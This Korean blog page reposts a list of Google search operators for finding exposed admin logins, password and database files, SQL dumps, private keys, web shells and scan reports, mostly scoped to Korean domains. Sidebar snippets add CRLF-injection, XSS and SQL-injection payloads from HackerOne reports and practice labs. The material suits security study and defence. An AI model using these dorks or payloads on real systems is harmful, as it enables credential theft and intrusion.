기본 콘텐츠로 건너뛰기

test

* 39.117.243.43 * | Home | Profile | Linux | 자료실 | zabbix | Mysql 5.6 | 갤러리 | 성경검색 | 해피니스 | 자유게시판 | 게시물검색 | L | O | R | [기초강좌] 구글 검색 옵션 작성자 : rootmanDate : 2007-02-07 09:39 | Hit : 729,786 --------------------------------------------- facebook 관련글 검색 --------------------------------------------- 키워드 + space + site:facebook.com 키워드 + spcae + site:facebook.com/pages 키워드 + spcae + site:facebook.com/group 키워드 + spcae + site:facebook.com/profile --------------------------------------------- 로그 파일 --------------------------------------------- db filetype:log intitle:"index of" intext:(backup|백업|bak|dump) --------------------------------------------- 로그인 --------------------------------------------- 로그인 inurl:/admin filetype:php inurl:/admin filetype:asp "VNC Desktop" inurl:5800 intitle:"원격 데스크톱 웹 연결" inurl:tsweb intitle:관리자 로그인 intitle:"인트라넷" intitle:"intranet" intitle:"직원용 intitle:"사내" intext:로그인" --------------------------------------------- 패스워드 파일 --------------------------------------------- intext:mysql_connect+pass intext:mysql_connect filetype:bak inurl:"/level/*/exec/" intext:password intitle:index.of intext:sc_serv_gui.ini filetype:ini wcx_ftp intitle:index.of ws_ftp.ini intitle:technote inurl:cgi-bin --------------------------------------------- 해킹 파일 검색 --------------------------------------------- intitle:"PHP Shell *" intext:Command filetype:php --------------------------------------------- 해킹 파일 검색 --------------------------------------------- inurl:/_vti_bin/shtml.exe inurl:/cgi-bin/finger inurl:cgi-bin/guestbook.pl inurl:/_vti_pvt/admin.pwd inurl:/phpBB/search.php inurl:/zeroboard/login.php inurl:/cgi-bin/14all.cgi --------------------------------------------- 민감한 데이터 --------------------------------------------- intitle:index.of .bash_history or index.of .sh_history allintext:대외비 --------------------------------------------- 포트 스캐너 --------------------------------------------- "VNC Desktop" inurl:5800 inurl:":10000" intext:webmin inurl:8080 -inurl:board -intext:8080 or inurl:8000 -inurl:board -intext:8000 intitle:"Network query tool" filetype:php or inurl:nqt.php --------------------------------------------- SQL 데이터 수집 --------------------------------------------- "access denied for user" "using password" "access denied for user" "using password" site:co.kr "# Dumping data for table" "# Dumping data for table" username password "# Dumping data for table(username|user|pass|password|passwd)" "ORA-00933: SQL command not properly ended" "Unclosed quotation mark before the character string" intitle:"에러" "에러 발생" filetype:asp intitle:"Error" "에러 발생" filetype:asp Mysql error message: "supplied argument" inurl:main.php3 Welcome to phpMyAdmin site:co.kr filetype:sql+"IDENTIFIED BY" -cvs or filetype:dmp+"IDENTIFIED BY" -cvs filetype:"(sql|dmp|dump|inc)" password filetype:mdb inurl:users.mdb "Warning:pg_connet(): Unalbe to connect to PostgreSQL server:FATAL" filetype:ldb admin inurl:db intext:password filetype:sql filetype:"(sql|dmp|dump|inc)" password inurl:config.php dbuname dbpass inurl:nuke filetype:sql -cvs filetype:inc intext:mysql_connect filetype:inc dbconn site:kr --------------------------------------------- 인증서 --------------------------------------------- BEGIN(CERTIFICATE|RSA|DEA) filetype:key, or filetype:cer or filetype:der filetype:pem PRIVATE -cvs --------------------------------------------- 취약점 스캐너 --------------------------------------------- "This file was generated by Nessus" -site:ihackstuff.com "This file was generated by Network Security Scanner" site:co.kr intext:"QualysGuard" -site:qualys.com intitle"X-Scan Report" intext:"This file was generated by X-Scan" "Network Vulnerability Assessment Report" --------------------------------------------- 침입탐지 데이터 --------------------------------------------- ACID "by Roman Danyliw" filetype:php --------------------------------------------- SSH Key --------------------------------------------- filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS --------------------------------------------- IRC --------------------------------------------- filetype:cgi "cgi:irc" filetype:conf inurl:psybnc.conv "USER.PASS=" --------------------------------------------- 방어(Prevention) --------------------------------------------- 1. Googledork Prevention Googledork Prevention(FoundStone, Inc. SiteDigger) 2. 자동 검색 툴을 이용한 방어 (GoogleAlert, Inc. http://www.googlealert.com) (gooscan http://johnny.ihackstuff.com) Total. 197 번호 분류 제목 작성자 등록일 조회수 122 기초강좌 아파치 로그 파일 - 특이한 녀석들은 따로 담거나 없애기 rootman 06-30 6545 121 기초강좌 Linux /proc/pid/stat 구조 rootman 06-30 8466 120 기초강좌 e2fsck 를 이용한 파일시스템 무결성 점검 rootman 06-12 6172 119 기초강좌 grep 검색어에 highlight 주기 rootman 04-22 5597 118 기초강좌 nfs 사용하기 rootman 04-10 8085 117 기초강좌 ssh 패스워드 없이 로그인하기 rootman 01-28 9411 116 기초강좌 하드디스크 온도 측정하기(smartctl 이용) rootman 12-31 7590 115 기초강좌 [HTML] HTML에서 사용하는 주요 메타테그 rootman 12-10 6229 114 기초강좌 [BMT] bonnie++를 통한 시스템 벤치마킹(BMT Tool) rootman 11-24 17681 113 기초강좌 [vim] /etc/vimrc 설정 파일 rootman 11-12 6855 112 기초강좌 커널에 모듈 추가 rootman 11-05 5861 111 기초강좌 CentOS에서 smtp relay 제공하기 rootman 06-05 6552 110 기초강좌 파일시스템 관련명령어 rootman 05-24 8938 109 기초강좌 ramdisk 이용하기 rootman 03-02 9629 108 기초강좌 구글 검색 옵션 rootman 02-07 729787 처음 1 2 3 4 5 6 7 8 9 10 다음 맨끝 제출 AND OR 2. googlehackking https://m.blog.naver.com/ppp7009/70153191675

댓글

이 블로그의 인기 게시물

HackerOne Vulnerability Analysis 1

이 문서는  HackerOne 에서  제출된 많은 보고서들을 토대로 핵심 Payload만 요약하여 직접 작성하였습니다. Link :  https://hackerone.com/ Vulnerabilities list 1. CRLF Injection 2. Open Redirection  3. Cross-Site-Scripting 4. SQL-Injection 5. Path Traversal  CRLF Injection PoC http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com; https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com; HTTP Response: HTTP/1.1 302 Moved Temporarily ... Location: http://myshopify.com/xxcrlftest Set-Cookie:test=test;domain=.myshopify.com; PoC: https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com HTTP Response: HTTP/1.1 301 Moved Permanently ... Location: http://engineeringblog.yelp.com/xxcrlftest Set-Cookie: test=test;domain=.yelp.com PoC (Chrome, Internet Explorer) http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; HTTP Resp...

Juice Shop XSS [ Dom based XSS ]

Juice Shop XSS [ Dom based XSS ] Search 입력란에 악성 스크립트를 넣어 XSS 취약점을 진단합니다. Payload :  <iframe src="javascript:alert(`xss`)">   다음과 같이 이는 < , > 는 &lt; , &gt; 로 특수문자를 필터링하지 않기에 XSS 에 취약합니다.

DVWA SQL Injection

DVWA  SQL Injection low [그림 1] Summary [그림1] 는 SQLInjection 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다 Description [그림 1] 은 ' , # , -- ,= 등 SQLInjection 에 취약한 특수문자등을 필터링하지 않아 SQL주입이 가능합니다. Steps to reproduce ORDER BY Query 1' order by 1,2# User ID:    ID: 1' ORDER BY 1,2# First name: admin Surname: admin UNION Query ' UNION SELECT 1,@@version#  User ID:    ID: 1' UNION SELECT 1,version()# First name: admin Surname: admin ID: 1' UNION SELECT 1,version()# First name: 1 Surname: 10.4.8-MariaDB ' UNION ALL SELECT 1,column_name from information_schema.columns# User ID:    ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: user_id ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: first_name ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: last_name ID: ' UNION ALL SELECT 1,column_name from in...